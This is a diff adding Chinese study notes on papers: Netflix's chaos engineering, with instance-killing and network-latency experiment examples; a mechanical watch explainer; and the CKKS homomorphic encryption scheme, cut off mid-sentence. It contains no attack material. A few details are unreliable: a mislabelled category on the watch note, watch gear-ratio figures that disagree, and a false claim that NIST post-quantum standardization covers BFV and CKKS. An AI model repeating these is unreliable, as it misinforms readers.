+参考答案(先自己想) + +1. 中间 assistant 回复在信息不全时引入 unsupported assumptions,最终轮仍 conditioning 于这些 self-generated text → self-anchored drift。 +2. 不强在能力:同一 Qwen3-8B backbone;强在**呈现**——teacher 看 FULL,student 看 RAW-SHARDED。无外部更强模型。 +3. Reverse KL 模式覆盖:让学生分布贴近 FULL 教师;mask 限制在最终答案,避免蒸馏过程回复的格式差异干扰。 +4. CONCAT 有分片、无 assistant 污染,用来分离「分片本身」vs「self-anchor」的贡献。 +5. **Reset-then-answer**(每轮先重述 Current goal)对 base 帮助更大;defer-until-complete 收益很小。 + +
diff --git a/src/content/docs/papers/chaos-engineering-netflix-2016.md b/src/content/docs/papers/chaos-engineering-netflix-2016.md new file mode 100644 index 000000000..0a977d945 --- /dev/null +++ b/src/content/docs/papers/chaos-engineering-netflix-2016.md @@ -0,0 +1,279 @@ +--- +title: Chaos Engineering — Netflix 如何把「故意搞破坏」变成可靠性学科 +来源: https://arxiv.org/abs/1702.05843 +日期: 2026-06-13 +分类: 其他 +子分类: 工程文化 +provenance: pipeline-v3 +--- + +## 先想成什么事 + +想象你管理一栋**大型商场**(这就是 Netflix 那样的分布式在线服务): + +- 电梯、空调、收银、监控、消防喷淋各自是不同承包商(微服务)。 +- 顾客以为自己在逛「一家店」,背后其实是几十套系统同时协作。 +- 真正可怕的不是「某台收银机坏了」——而是**连锁反应**:电梯卡死 → 疏散通道堵死 → 监控误报 → 全场停业。 + +传统做法像**等火灾再练逃生**:上线前做单元测试、集成测试、预发压测,然后祈祷生产别出事。问题是:测试环境再像生产,也模拟不了「周三晚高峰 + 某个机房光缆被挖断 + 配置中心推了错误参数」这种组合。 + +Netflix 的做法像**定期消防演习**,而且演习发生在**营业中的商场**: + +- 随机关掉几台收银机(Chaos Monkey 杀 EC2 实例),看顾客能不能换队伍结账。 +- 偶尔模拟**整层停电**(Chaos Kong 区域级演练)。 +- 让部分服务之间的「内部电话」故意占线(Failure Injection Testing,FIT),看推荐页能不能降级成静态列表。 + +这篇论文(Basiri、Hochstein 等,**IEEE Software** 2016 年 5–6 月,arXiv:1702.05843)把上述实践提炼成一门学科:**混沌工程(Chaos Engineering)**——在分布式系统上**做受控实验**,从而建立「生产环境能承受动荡」的信心。 + +## 这篇论文在说什么 + +| 维度 | 内容 | +|------|------| +| 标题 | Chaos Engineering | +| 作者 | Ali Basiri, Narayan Behnam, Rudolph de Rooij, Lorin Hochstein, Jon Kosewski, Jake Reynolds, Colin Rosenthal(Netflix) | +| 发表 | IEEE Software, vol. 33, no. 3, pp. 35–41, May–June 2016 | +| arXiv | [1702.05843](https://arxiv.org/abs/1702.05843)(2017-02 提交) | +| 延伸 | [Principles of Chaos Engineering](https://principlesofchaos.org/)(业界四原则与实验步骤的公开版) | + +论文核心论断: + +> **混沌工程是在分布式系统上进行实验的学科,目的是建立系统在生产动荡条件下仍能正常工作的信心。** + +「动荡」可以是硬件宕机、流量突增、配置项写错、依赖服务超时——任何能让**可观测行为**偏离常态的事件。 + +## 为什么值得读(零基础也能建立图景) + +现代服务几乎都是**分布式系统**:多实例、多机房、异步队列、缓存、CDN、第三方 API。组件单独测过「能跑」,组合起来会出现论文里说的 **emergent behavior(涌现行为)**——没人写过的那条失败路径,往往在第一次大促才现身。 + +混沌工程不是「运维发疯删库」,而是把可靠性验证变成**可重复的科学实验**: + +- 有**假设**(steady state 不会被破坏) +- 有**对照**(实验组注入故障 vs 对照组) +- 有**度量**(错误率、延迟分位数、业务 KPI) +- 有**自动化**(否则一次手工演练的结论会随代码腐烂而过期) + +它和 [[helland-2007]]「大规模下别迷信分布式事务」、[[spanner]] 多副本一致性、[[firecracker-microvm-2020]] 隔离边界是同一可靠性谱系的不同切面:前者讲架构取舍,混沌工程讲**如何在真实流量下验证这些取舍没骗人**。 + +## 核心概念 + +### 1. 稳态(Steady State) + +不要盯着「CPU 是不是 37%」这种内部指标,而要找**能代表系统「正常工作」的可测量输出**: + +- 吞吐量(如每秒成功播放次数) +- 错误率 +- 延迟分位数(p50 / p95 / p99) +- 业务 KPI(注册转化率、订单完成率) + +论文与 principlesofchaos.org 都强调:**稳态是一段时间内输出指标的集合**,是系统行为的「代理变量」。实验就是看注入故障后,这些输出是否仍落在正常带内。 + +Netflix 历史上用 **SPS(starts per second,每秒播放启动次数)** 作为关键稳态信号之一——观众点播放,系统就必须在可接受延迟内出画面。 + +### 2. 实验四步法(设计一次混沌实验) + +论文给出的流程与科学实验模板一致: + +1. **定义稳态**:选可观测输出,划定「正常」区间。 +2. **建立假设**:对照组与实验组在注入前都应保持稳态;注入真实世界事件后,**稳态仍应成立**(或按设计优雅降级)。 +3. **引入变量**:从「现实中可能发生的事件」采样——宕机、磁盘坏、网络断、依赖超时、流量尖峰、错误配置。 +4. **试图证伪**:若实验组稳态与对照组显著偏离,假设被推翻——你发现了可靠性漏洞,而不是「实验失败」。 + +注意:证伪成功 = 工程上的胜利,因为你赶在用户之前找到了 bug。 + +### 3. 混沌工程的四大原则 + +| 原则 | 含义 | 直觉 | +|------|------|------| +| **围绕稳态建立假设** | 实验检验的是可观测行为,不是「某台机器灯还亮着」 | 顾客能看电影,比「Pod 还在」重要 | +| **变化真实世界事件** | 刺激应从历史故障、告警、变更记录里采样 | 专挑发生过的问题重演 | +| **在生产环境运行** | 真实流量路径与资源竞争无法被测试环境完全复制 | 演习要在营业中进行(有安全绳) | +| **持续自动化** | 手工演练会腐烂;系统每次发布都改变失败模式 | 消防演习要进 CI/CD,而不是年终一次 | + +第三条最反直觉,也最有争议:**没有 blast radius 控制、没有自动熔断和回滚的生产实验是鲁莽,不是混沌工程。** + +### 4. Netflix 工具谱系(论文语境) + +| 工具 | 做什么 | 规模 | +|------|--------|------| +| **Chaos Monkey** | 在工作时间随机终止生产 EC2 实例 | 单机 / 单实例 | +| **Chaos Kong** | 模拟整个 AWS 区域不可用 | 区域级 | +| **FIT**(Failure Injection Testing) | 让服务间调用失败,验证降级路径 | 依赖 / RPC 级 | +| **ChAP**(Chaos Automation Platform,后续工作 arXiv:1702.05849) | 分流一小部分线上流量并注入故障,自动比对稳态 | 持续自动化 | + +Chaos Monkey 故意只在**工作时间**运行,以便工程师能立刻响应——这本身就是 blast radius 设计。后来社区开源了 [Netflix/chaosmonkey](https://github.com/Netflix/chaosmonkey)(Go,与 Spinnaker 集成)。 + +## 代码示例一:用 Python 描述「稳态假设 + 实验」骨架 + +下面不是 Netflix 内部代码,而是把论文四步法翻译成可运行的**最小实验框架**:在注入故障前后拉 Prometheus 指标,判断稳态是否被破坏。 + +```python +from dataclasses import dataclass +from time import sleep +import random +import requests + +PROM = "http://localhost:9090/api/v1/query" + +@dataclass +class SteadyState: + """稳态:错误率 < 1% 且 p99 延迟 < 500ms""" + max_error_rate: float = 0.01 + max_p99_seconds: float = 0.5 + + def observe(self) -> dict: + err = float(requests.get(PROM, params={ + "query": 'rate(http_requests_total{status=~"5.."}[1m])' + '/ rate(http_requests_total[1m])' + }).json()["data"]["result"][0]["value"][1]) + p99 = float(requests.get(PROM, params={ + "query": 'histogram_quantile(0.99, rate(http_request_duration_seconds_bucket[1m]))' + }).json()["data"]["result"][0]["value"][1]) + return {"error_rate": err, "p99": p99} + + def is_healthy(self, m: dict) -> bool: + return m["error_rate"] < self.max_error_rate and m["p99"] < self.max_p99_seconds + +def kill_random_instance(asg_client, group_name: str) -> str: + """混沌变量:终止一台实例(类比 Chaos Monkey)""" + inst = random.choice(asg_client.describe_instances(group_name)) + asg_client.terminate_instance(inst) + return inst + +def run_experiment(asg_client, group_name: str) -> bool: + steady = SteadyState() + baseline = steady.observe() + assert steady.is_healthy(baseline), "对照组尚未稳态,拒绝实验" + + victim = kill_random_instance(asg_client, group_name) + print(f"injected: terminated {victim}") + + sleep(120) # 等待流量重均衡 + after = steady.observe() + hypothesis_holds = steady.is_healthy(after) + print(f"baseline={baseline} after={after} hypothesis_holds={hypothesis_holds}") + return hypothesis_holds + +if __name__ == "__main__": + ok = run_experiment(asg_client=..., group_name="api-prod") + if not ok: + raise SystemExit("稳态被破坏 — 需要修复冗余/超时/熔断,而非责怪实验") +``` + +要点: + +- **先验证对照组健康**,否则实验没有基线。 +- **注入后等待足够长**,让负载均衡、缓存预热、熔断器状态稳定下来再判定。 +- 失败时默认是**系统设计问题**,不是「别做混沌」。 + +## 代码示例二:Kubernetes 上用 Litmus 做「依赖超时」实验 + +第二类常见变量不是杀 Pod,而是**让下游变慢或失败**(对应 FIT / 微服务降级验证)。LitmusChaos 是 CNCF 生态里常用的混沌框架;下面是一个 `NetworkChaos` 片段,对 `catalog` 服务的出站流量注入延迟: + +```yaml +apiVersion: litmuschaos.io/v1alpha1 +kind: ChaosEngine +metadata: + name: catalog-network-latency + namespace: production +spec: + appinfo: + appns: production + applabel: "app=catalog" + appkind: deployment + chaosServiceAccount: litmus-admin + experiments: + - name: pod-network-latency + spec: + components: + env: + - name: NETWORK_LATENCY + value: "2000" # 注入 2s 延迟 + - name: TARGET_CONTAINER + value: "catalog" + - name: DESTINATION_HOSTS + value: "ratings.default.svc.cluster.local" + - name: TOTAL_CHAOS_DURATION + value: "300" # 持续 5 分钟 + probe: + - name: "checkout-success-rate" + type: "promProbe" + mode: "Continuous" + promProbe/inputs: + endpoint: "http://prometheus.monitoring:9090" + query: | + sum(rate(checkout_completed_total[1m])) + / sum(rate(checkout_attempted_total[1m])) + comparator: + type: "float" + criteria: ">=" + value: "0.995" # 结账成功率仍须 ≥ 99.5% +``` + +这段配置体现了论文原则: + +- **真实事件**:网络变慢是数据中心日常风险。 +- **稳态探针**:用业务指标 `checkout_completed` 而非仅看 Pod Ready。 +- **有界时长**:300 秒后自动停止,控制 blast radius。 + +若探针在实验期间失败,Litmus 会把实验标为失败——等价于**证伪了「ratings 慢 2 秒不影响结账」的假设**。 + +## 实验设计清单(上手时可打印) + +1. **稳态指标是否与用户痛苦对齐?**(别只监控 CPU) +2. **爆炸半径**:能否限制在单个区域、单个集群、1% 流量(ChAP 思路)? +3. **能否一键中止?**(Kill switch、实验 TTL) +4. **是否在流量低谷先试?**(Chaos Monkey 的工作时间策略) +5. **事后有没有写 postmortem 并反哺下一批变量?**(论文强调用历史 outage 采样刺激) +6. **是否自动化到每次发布都跑?**(否则结论会腐烂) + +## 与其他实践的关系 + +| 实践 | 与混沌工程的关系 | +|------|------------------| +| **单元 / 集成测试** | 验证「组件按 spec 工作」;混沌验证「组合在动荡下仍工作」 | +| **金丝雀发布** | 控制变更风险;混沌控制**基础设施与依赖**风险,二者互补 | +| **游戏日(Game Day)** | 常用手工、大规模演练;混沌工程强调**持续、自动化、可度量** | +| **故障注入(Fault Injection)** | 混沌工程是其上的**实验方法论 + 文化**(假设、稳态、生产、自动化) | + +O'Reilly《Chaos Engineering》一书(Rosenthal、Jones 等)把 Netflix 经验推广为行业手册;Kubernetes 生态的 [Chaos Mesh](https://github.com/chaos-mesh/chaos-mesh)、[Litmus](https://litmuschaos.io/)、AWS [Fault Injection Simulator](https://aws.amazon.com/fis/) 都是同一思想的工程产品化。 + +## 常见误解 + +1. **「混沌 = 随机删生产」** — 没有假设、没有稳态度量、没有半径控制,那只是事故。 +2. **「测试环境做就行」** — 测试环境缺少真实流量组合、缓存状态、租户隔离压力;论文明确偏向生产(在有保护措施的前提下)。 +3. **「一次通过就永久安全」** — 代码、配置、流量模式一直在变;实验必须**持续自动化**重复。 +4. **「只有大公司才需要」** — 三个微服务 + 一个 Redis 也会有级联超时;规模小反而更该用**小半径**实验养成习惯。 + +## 踩过的坑(Netflix 与社区共识) + +1. **稳态选错**:监控 Pod 存活,却漏掉「播放启动成功率」下跌——用户已经受影响,实验却显示 green。 +2. **对照组不存在**:全集群一起注入,无法区分是故障还是本来就有发布——论文四步法要求能比较实验组与对照组行为。 +3. **没有超时上限**:2 秒网络延迟实验跑了 6 小时,把缓存打穿——`TOTAL_CHAOS_DURATION` 不是装饰。 +4. **组织未就绪**:开发从未写过降级路径,第一次 Chaos Monkey 等于通知全公司「我们没做冗余」——文化上要先让「实例会死」成为默认假设(论文:工程师被迫把容错当日常设计)。 +5. **与变更窗口打架**:在大促当天做区域级 Kong 演练 — 半径与业务日历冲突。 + +## 适用 vs 不适用 + +**适用**: + +- 多实例、多依赖的在线服务(流媒体、电商、API 平台) +- 已有基本可观测性(metrics / tracing / 告警) +- 团队认同「实验可能发现 bug」而不是「实验不能失败」 + +**暂缓或缩小规模**: + +- 尚无自动回滚、无 on-call 覆盖的单点系统 +- 强监管场景下未经审批的生产实验 +- 连单元测试都未绿的新服务 — 先修「确定性错误」,再探索「涌现错误」 + +## 延伸阅读 + +- 论文原文:[arXiv:1702.05843](https://arxiv.org/abs/1702.05843) +- 原则站:[principlesofchaos.org](https://principlesofchaos.org/) +- 自动化平台:[A Platform for Automating Chaos Experiments (ChAP)](https://arxiv.org/abs/1702.05849) +- 开源 Chaos Monkey:[github.com/Netflix/chaosmonkey](https://github.com/Netflix/chaosmonkey) +- 相关笔记:[[firecracker-microvm-2020]](隔离与密度)、[[kubernetes]](编排层承载混沌实验)、[[spanner]](多副本一致性背景) + +## 一句话总结 + +**混沌工程把可靠性从「祈祷生产别出事」变成「在生产中用真实流量做可证伪实验」;Netflix 用 Chaos Monkey 教会工程师「实例随时会死」,再用稳态度量与自动化把这门手艺变成持续学科。** diff --git a/src/content/docs/papers/ciechanowski-mechanical-watch.md b/src/content/docs/papers/ciechanowski-mechanical-watch.md new file mode 100644 index 000000000..e01ffba65 --- /dev/null +++ b/src/content/docs/papers/ciechanowski-mechanical-watch.md @@ -0,0 +1,269 @@ +--- +title: 机械表——从零理解精密齿轮系统 +来源: https://ciechanow.ski/mechanical-watch/ +日期: 2026-06-13 +分类: CLI +子分类: 编辑器与 IDE +provenance: pipeline-v3 +--- + +# 机械表:不需要电池的时间机器 + +## 一、开篇:一根弹簧如何驱动一块表? + +想象你有一根橡皮筋。把它绕紧,松开手,它会快速弹回去——这就是能量释放。机械表的原理跟这个很像,只不过它用的不是橡皮筋,而是一根精心设计的金属螺旋弹簧,整个系统由几百个比米粒还小的零件组成。 + +Bartosz Ciechanowski 的这篇交互式文章用动画一步步展示了机械表内部是如何运作的。全文没有一段代码,但整个机芯就是一个巨大的"程序"——每个齿轮是一个函数调用,每次擒纵轮的"滴答"是一次时钟中断。 + +## 二、七大核心组件 + +机械表的计时系统可以抽象为一条直线上的七个主要元素: + +1. **发条(Mainspring)** — 能量来源 +2. ** barrel(发条盒)** — 容纳发条的外壳 +3. **齿轮组(Gear Train)** — 减速增转 +4. **擒纵轮(Escape Wheel)** — 能量阀门 +5. **叉瓦(Pallet Fork)** — 开关控制器 +6. **摆轮(Balance Wheel)** — 振荡器/时钟 +7. **摆轮游丝(Balance Spring)** — 弹性恢复力 + +下面我们从第一个开始,逐一拆解。 + +## 三、能量来源:发条与发条盒 + +### 日常类比 + +把发条想象成"弹簧版的水库"。水库存水,发条存能。你拧表冠就像在往水库里注水——把发条绕紧,储存势能。 + +### 关键概念 + +- **发条(Mainspring)**:一根 S 形螺旋扭转弹簧。放松状态下呈 S 形,绕紧后变成紧密的螺旋。 +- **发条盒(Barrel)**:一个封闭的金属圆筒,把发条关在里面。 +- **心轴(Arbor)**:插在发条中心的轴,用来绕紧发条。 + +### 伪代码理解 + +``` +// 发条盒的简化模型 +struct Barrel { + Mainspring spring; // 内部的螺旋弹簧 + int teeth; // 外圈的齿数(用于驱动下一个齿轮) +} + +// 上链操作:顺时针旋转心轴 +function wind(barrel: Barrel): + barrel.spring.twist(direction=CLOCKWISE) + // 弹簧被绕紧,势能增加 + // 最大绕紧约 7 圈 + +// 释放能量:发条盒转动,驱动齿轮组 +function unwind(barrel: Barrel) -> torque: + return barrel.spring.release() + // 弹簧试图恢复原状 → 带动发条盒旋转 +``` + +发条绕紧后,如果什么都不做,它会在一两秒内全部弹开——太快了,没法用来计时。我们需要一个"限速器"。 + +## 四、齿轮组:把快转变成慢转 + +### 日常类比 + +自行车有变速齿轮:大齿轮带小齿轮,小齿轮转得更快。机械表反过来用——用小齿轮带动大齿轮来减速。但手表空间有限,不能放一个巨大齿轮,所以用了一串齿轮逐级传递,称为"轮系"(Gear Train)。 + +### 关键概念 + +- **主动轮(Driving Gear)**:带动别人的齿轮 +- **从动轮(Driven Gear)**:被别人带动的齿轮 +- **小齿轮(Pinion)**:每个轴上的小齿轮,驱动下一个轴上的大齿轮 +- ** going train(走时轮系)**:从发条盒到秒针的齿轮链条 + +### 数学推导 + +发条盒绕紧后大约转 7 圈。我们希望秒针转 2400 圈(40 小时 × 60 分钟)。 + +``` +总传动比 = 2400 / 7 ≈ 343 : 1 +``` + +如果只用一对齿轮实现 343:1,大齿轮要有 343 个小齿轮的齿——完全不现实。所以用多级齿轮: + +``` +// 四级齿轮组的传动比计算 +// 假设每级的传动比为 5:1 +总传动比 = 5 × 5 × 5 × 5 = 625 : 1 +// 实际设计中每级传动比不同,但思路一致 + +// 每一级的关系: +// 发条盒(第1轮)→ 第2轮 → 第3轮 → 第4轮(秒针) +// 每级:大齿轮带动小齿轮,小齿轮同轴连着下一级大齿轮 +``` + +### 伪代码理解 + +``` +// 齿轮对的简化模型 +struct GearPair { + int driving_teeth; // 主动轮齿数 + int driven_teeth; // 从动轮齿数 +} + +// 计算传动比 +function gear_ratio(pair: GearPair) -> float: + return pair.driving_teeth / pair.driven_teeth + +// 多级齿轮组的总传动比 +function total_reduction(pairs: list) -> float: + ratio = 1.0 + for pair in pairs: + ratio *= gear_ratio(pair) + return ratio + +// 示例:四级轮系 +pairs = [ + GearPair(driving_teeth=72, driven_teeth=12), // 5:1 + GearPair(driving_teeth=64, driven_teeth=8), // 8:1 + GearPair(driving_teeth=60, driven_teeth=10), // 6:1 + GearPair(driving_teeth=60, driven_teeth=10), // 6:1 +] +// 总传动比 = 5 × 8 × 6 × 6 = 1440 : 1 +// 发条盒转 7 圈 → 秒针转约 10080 圈(实际设计更精细) +``` + +齿轮组解决了"转多少圈"的问题,但还没解决"以什么速度转"的问题。秒针可能一下子转几百圈——我们需要一个精确控制的"闸门"。 + +## 五、擒纵机构:时间的守门人 + +这是机械表最精妙的部分。 + +### 日常类比 + +想象你在推一个秋千。你不可能一直推——推一下,放手,让它自己荡回来,再推一下。擒纵机构就是那个"推一下、放手一下"的手。每一次"推",齿轮前进一个齿;每一次"放手",时间就流逝了一个固定间隔。 + +### 关键概念 + +- **擒纵轮(Escape Wheel)**:齿形特殊的齿轮,普通齿轮的齿是均匀的,擒纵轮的齿顶部有凹槽 +- **叉瓦(Pallet Fork)**:一个可以左右摆动的杠杆,两端各有一颗人造红宝石(jewel) +- **红宝石(Jewel)**:合成红宝石,硬度高、摩擦系数低,用作轴承减少磨损 + +### 工作流程 + +``` +// 擒纵机构的循环 +loop: + 1. 摆轮摆动 → 宝石撞击叉瓦 + 2. 叉瓦移位 → 擒纵轮解锁 + 3. 擒纵轮在发条驱动下推动叉瓦 + 4. 叉瓦通过宝石给摆轮一个推力(补充能量) + 5. 擒纵轮再次锁死 + 6. 摆轮继续摆动到另一侧 → 回到步骤 1 +``` + +这个循环的频率决定了走时的精度。这块表的摆轮每秒来回摆动 4 次(8 beats),即每小时 28,800 次。 + +## 六、摆轮与游丝:机械表的"心跳" + +### 日常类比 + +摆轮+游丝的组合就像一个微型秋千。游丝是弹簧,提供回复力;摆轮是秋千座板,提供质量。两者构成一个简谐振荡器——这就是机械表的"时钟"。 + +### 关键概念 + +- **摆轮(Balance Wheel)**:带质量的轮子,来回摆动 +- **摆轮游丝(Balance Spring / Hairspring)**:极细的螺旋弹簧,控制摆动频率 +- **快慢针(Regulator)**:调节游丝有效长度,微调走时快慢 +- **Nivarox 合金**:温度变化时刚度几乎不变的特种合金 + +### 物理公式 + +简谐振荡器的周期公式: + +``` +T = 2π × √(I / κ) +``` + +其中: +- `T` = 摆动周期 +- `I` = 转动惯量(质量分布离轴越远,I 越大) +- `κ` = 游丝的扭转刚度 + +### 伪代码理解 + +``` +// 摆轮振荡器的简化模型 +struct BalanceWheel { + float moment_of_inertia; // 转动惯量 I + float spring_stiffness; // 游丝刚度 κ + float angle; // 当前角度 + float angular_velocity; // 角速度 +} + +// 计算摆动周期 +function oscillation_period(bw: BalanceWheel) -> float: + T = 2 * PI * sqrt(bw.moment_of_inertia / bw.spring_stiffness) + return T + +// 每半周期的时间(一次"滴"或"嗒") +function half_beat(bw: BalanceWheel) -> float: + return oscillation_period(bw) / 2 + +// 示例:28,800 beats/hour 的表 +// 每秒 8 beats → 每 beat 125ms → 半周期 125ms → 全周期 250ms +// T = 0.25s = 2π × √(I / κ) +// 设计者通过调整 I(配重螺丝位置)和 κ(游丝材质/长度)来达到这个值 +``` + +## 七、关键机制速览 + +### 7.1 单向棘轮(Click Mechanism) + +防止发条自己松掉。类似自行车飞轮的"咔哒"声——只能朝一个方向用力。 + +``` +// 棘轮机构 +function wind_with_crown(): + crown_wheel.turn(CLOCKWISE) + click.swing_aside() // clicks 被推开 + ratchet_wheel.turn() // 发条被绕紧 + click.snap_back() // 咔哒一声 + +function prevent_unwind(): + // 逆时针方向时,click 卡住 crown_wheel + // 发条无法反向松脱 +``` + +### 7.2 无钥系(Keyless Works) + +通过拨动表冠的不同档位,实现三种功能: + +| 档位 | 动作 | 效果 | +|------|------|------| +| 推入到底 | 旋转表冠 | 上链 | +| 拉到一半 | 旋转表冠 | 调日期 | +| 拉到最外 | 旋转表冠 | 调时间 | + +### 7.3 自动上链 + +利用佩戴者手臂摆动时的重力,让一个半圆形重锤(weight)来回摆动,再通过双向棘轮机构将正反两个方向的运动都转化为同一个方向的卷簧力。 + +## 八、核心思想总结 + +| 模块 | 作用 | 类比 | +|------|------|------| +| 发条+发条盒 | 储能 | 弹簧版水库 | +| 齿轮组 | 减速增转 | 自行车变速 | +| 擒纵轮+叉瓦 | 能量阀门 | 推秋千的手 | +| 摆轮+游丝 | 振荡器/时钟 | 微型秋千 | +| 棘轮机构 | 单向锁定 | 自行车飞轮 | +| 无钥系 | 多功能切换 | 多档开关 | +| 自动上链 | 动能回收 | 汽车再生制动 | + +机械表的本质:**用一个周期性振荡器(摆轮游丝)来控制能量的释放速率**。发条提供能量,齿轮组传递和转换转速,擒纵机构按摆轮的节拍"放行"能量——每一次放行,秒针前进一格。整个系统就像一个没有代码的程序,纯靠几何形状和物理定律运行。 + +## 九、延伸思考 + +Ciechanowski 的系列文章有一个共同特点:**把复杂系统拆成最小可理解的单元,然后用交互动画展示它们之间的关系**。这种学习方式对零基础的我们特别有效——不是先学一堆术语,而是在看到零件如何运动的瞬间就理解了它的意义。 + +建议后续阅读: +- 同一作者的 [齿轮详解](https://ciechanow.ski/gears/)——更深入地理解齿形设计 +- George Daniels《制表术》(Watchmaking)——从设计角度理解机芯 +- Wristwatch Revival YouTube 频道——看真实机芯的拆解与维修 diff --git a/src/content/docs/papers/ckks-homomorphic-2017.md b/src/content/docs/papers/ckks-homomorphic-2017.md new file mode 100644 index 000000000..f5342cd54 --- /dev/null +++ b/src/content/docs/papers/ckks-homomorphic-2017.md @@ -0,0 +1,341 @@ +--- +title: CKKS 同态加密 — 在加密数据上做近似浮点运算 +来源: https://eprint.iacr.org/2016/421.pdf +日期: 2026-06-13 +分类: 安全与隐私 +子分类: 安全与隐私 +难度: 高级 +provenance: pipeline-v3 +--- + +## 是什么 + +这篇 2017 年发表于 ASIACRYPT 的论文 **Homomorphic Encryption for Arithmetic of Approximate Numbers**(作者 Jung Hee Cheon、Andrey Kim、Miran Kim、Yongsoo Song)提出了 **CKKS 方案**——今天工业界最常用的「近似全同态加密」之一。开源实现 HEAAN 库(CryptoLab)的名字直接来自论文标题里的 **HE**(Homomorphic Encryption)+ **AAN**(Arithmetic of Approximate Numbers)。 + +日常类比: + +> 想象你把一叠**带小数点的测量数据**(体温、血压、模型权重)锁进一个**透明保险箱**里。保险箱外的人看不见数字,但可以在箱子上拧旋钮:拧一次「加」,箱内所有数同时加同一个值;拧一次「乘」,所有数同时乘同一个系数——全程不用开锁。拧多了,数字会有一点**磨损**(噪声和舍入误差),就像老式机械计算器最后一位会飘。CKKS 的天才之处在于:**不把磨损当敌人,而是把它当成近似算术里本来就会有的误差**,用「Rescaling(重缩放)」定期擦掉最不重要的尾数位,让磨损可控。 + +这和 [[brakerski-bgv-2012]]、BFV 的精确整数路线根本不同:后者要求明文是**精确整数**,解密结构是 `m + t·e` 或 `q·I + (q/t)·m + e`,乘法会把「噪声」和「有效数字」搅在一起,做浮点近似非常别扭。CKKS 把解密结构改成: + +\[ +\langle c, sk \rangle = m + e \pmod q +\] + +噪声 `e` 直接加在消息 `m` 旁边——如果 `e` 相对 `m` 足够小,就把 `m + e` 整体当作「带误差的近似值」继续算,和浮点运算的「有效位 + 尾数误差」哲学一致。 + +## 零基础前置:同态加密三句话 + +如果你从未接触过同态加密(Homomorphic Encryption,HE),先记住三句话: + +1. **加密**:明文 `m` 变成密文 `c`,外人看不出 `m`。 +2. **同态**:在密文上算 `f(c)`,解密后得到 `f(m)` 的近似——**不用先解密**。 +3. **CKKS 特化**:`m` 是**实数/复数向量**,`f` 是加法和乘法(以及由它们拼出的多项式、Taylor 级数等),结果允许有**可控误差**。 + +论文信息速览: + +| 项目 | 内容 | +|------|------| +| 预印本 | [eprint.iacr.org/2016/421](https://eprint.iacr.org/2016/421.pdf) | +| 会议 | ASIACRYPT 2017 | +| 作者 | Cheon, Kim, Kim, Song(简称 **CKKS**) | +| 实现 | HEAAN、Microsoft SEAL、OpenFHE、TenSEAL | +| 安全假设 | Ring-LWE(环上学习与错误) | + +## 为什么重要 + +不理解 CKKS,下面这些事都讲不清: + +- 为什么 **加密推理**(在云端算神经网络而不暴露输入)默认选 CKKS,而不是 RSA 或 AES +- 为什么 Microsoft SEAL、OpenFHE、TenSEAL 文档里到处是 `scale`、`coeff_modulus`、`rescale`——它们不是随便起的 API 名字,而是论文里的核心操作 +- 为什么隐私机器学习论文里常说「精度损失约 log(depth) 比特」——这是论文 Section 1 证明的**近似最优性** +- 为什么 NIST 后量子标准化里,**精确整数 HE**(BFV)和 **近似实数 HE**(CKKS)是两条平行产品线,不能互相替代 + +论文在 i5-2.9GHz 上实测:14 位精度的**同态乘法逆**摊销约 0.11 ms/slot;用七阶 Taylor 级数同态算 **logistic 函数**约 0.13 ms/slot——比当时没有 batching 的实现快两个数量级。这让「在加密数据上跑统计回归 / 神经网络一层」从理论可行变成工程可测。 + +## 论文要解决的核心矛盾 + +Gentry 的全同态加密奠基工作证明 HE **存在**,但早期方案对「近似实数」极不友好: + +| 路线 | 解密形态 | 近似算术的麻烦 | +|------|----------|----------------| +| BGV 型 | `m + t·e` | 乘法后噪声乘在明文模 `t` 上,**有效位被噪声淹没** | +| BFV/FV 型 | `q·I + (q/t)·m + e` | 乘法产生 `t·I₁·I₂` 项,**MSB 被破坏** | +| 比特编码 | 每位一个密文 | 深度 `d` 需要 `Ω(η·2^d)` 次运算或昂贵 bootstrapping | + +CKKS 的目标:**在 RLWE 安全假设下,对复数/实数向量做 SIMD 同态加乘,模数比特数只随电路深度线性增长,精度损失最多比明文浮点多 1 bit**。 + +## 核心概念 + +### 1. 明文空间:特征零的 cyclotomic 环 + +明文不是 `Z_t` 上的多项式,而是 **R = Z[X]/(Φ_M(X))** 里系数有界的整系数多项式(特征零)。通过 **复数典范嵌入(complex canonical embedding)** σ,把多项式映到 `C^{φ(M)/2}` 的向量——这是一个**等距**环同态,小误差不会在编码时放大。 + +编码流水线(论文 Section 1): + +``` +z ∈ C^{φ(M)/2} → π⁻¹ → H → round → σ(R) → σ⁻¹ → m(X) ∈ R +``` + +`π` 是到子群 T 的投影,`round` 把复数格点化。解码是逆过程。这样 **N/2 个复数 slot** 打进一个密文,同态加乘变成 slot 上的逐元素运算(SIMD)。 + +### 2. 加密与解密 + +- 环:`R_q = Z_q[X]/(X^n+1)`,`n` 是 2 的幂 +- 私钥 `s` 是小系数多项式 +- 密文 `c = (c₀, c₁) ∈ R_q²`,满足 `c₀ + c₁·s ≈ m + e (mod q)` +- **scale(缩放因子 Δ)**:加密前把消息乘 `Δ`(如 `2^40`),让噪声相对有效位更小 + +同态加法:密文分量相加,噪声线性增加。 + +同态乘法:张量积 + **relinearization**(用公开密钥把 `s²` 项压回 `s`),噪声约平方增长——和 BGV 类似,但消息也在变大。 + +### 3. Rescaling(重缩放)——CKKS 的灵魂 + +乘法后消息幅度和噪声都放大约 `Δ` 倍。Rescaling 做: + +``` +输入:c 加密 m,⟨c, sk⟩ = m + e (mod q) +输出:c' = round(p⁻¹ · c) (mod q/p),加密 m/p,噪声约 e/p +``` + +`p` 通常取最后一个模数因子(与 `Δ` 对齐)。效果等价于浮点运算里**丢掉若干 LSB、缩小尾数**——模数链从 `q₀ > q₁ > … > q_L` 逐级下降,**比特数随深度线性增长**,而不是指数爆炸。 + +论文 Figure 2 对比:BGV/FV 乘法破坏 MSB;CKKS 乘法 + Rescale 保留 MSB、裁掉 LSB。 + +### 4. 精度定理(直观版) + +对 `η` 位精度的 `d` 个数做深度 `d` 的乘法电路: + +- 明文浮点:结果约 `η - log d` 位有效精度 +- CKKS 同态:结果约 `η - log d - 1` 位——**最多多损失 1 bit** + +所需最大模数约 `O(η log d)` 比特,远小于比特编码路线的 `Ω(η·2^d)`。 + +### 5. 超越函数 + +Rescaling 让模数可控后,可用 Taylor 级数**同态**算 `exp`、`log`、三角函数、**乘法逆**(论文给出专门优化算法)。实测 logistic 函数(七阶 Taylor)适合疾病预测等统计场景。 + +### 6. 安全假设 + +基于 **Ring-LWE**:给定 `(a, a·s + e)` 无法区分 `e` 是随机还是小噪声。参数由环维数 `n`、模数 `q`、噪声分布决定安全级别(论文实现用 80-bit 